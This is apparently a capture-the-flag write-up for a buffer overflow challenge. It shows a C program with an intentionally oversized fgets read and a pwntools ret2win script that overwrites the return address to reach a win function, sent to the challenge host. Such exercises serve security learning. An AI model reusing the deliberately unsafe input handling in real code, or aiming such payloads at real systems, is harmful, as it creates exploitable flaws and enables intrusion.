Its Overflowing

Oh no we have found a vulnerable app in out system, help me find the broken part

As the title suggests, the challenge is a buffer overflow challenge.

Since we are given the code as well,

#include <stdio.h>
#include <stdlib.h>

void win() {
    printf("Oh No");
    system("cat flag.txt");
}
void main() {
    char flag[150];
    setvbuf(stdout, NULL, _IONBF, 0);
    setvbuf(stdin, NULL, _IONBF, 0);
    setvbuf(stderr, NULL, _IONBF, 0);
    printf("Enter the flag: ");
    fgets(flag, 1000, stdin);
}

We can find the buffer.

Thus, I find the ret address to be 0x0000000000401016

By using objdump, I can find teh address of the win function to be 0000000000401166

Since we have the buffer, the win address and the ret address, we can craft our solve script

from pwn import *

host = "chal1.gryphons.sg"
port = 10001

win_address = p64(0x401166)
padding = b'A' * 168
ret_address = p64(0x401016)

payload = padding + ret_address + win_address

print(f"Payload: {payload}")

p = remote(host, port)
p.recvuntil(b"Enter the flag: ")
p.sendline(payload)
p.interactive()

Thus giving us the flag GCTF24{0h_OoPs_0V3rFlOweD}

PreviousPwn NextTax Calculator

Last updated 1 year ago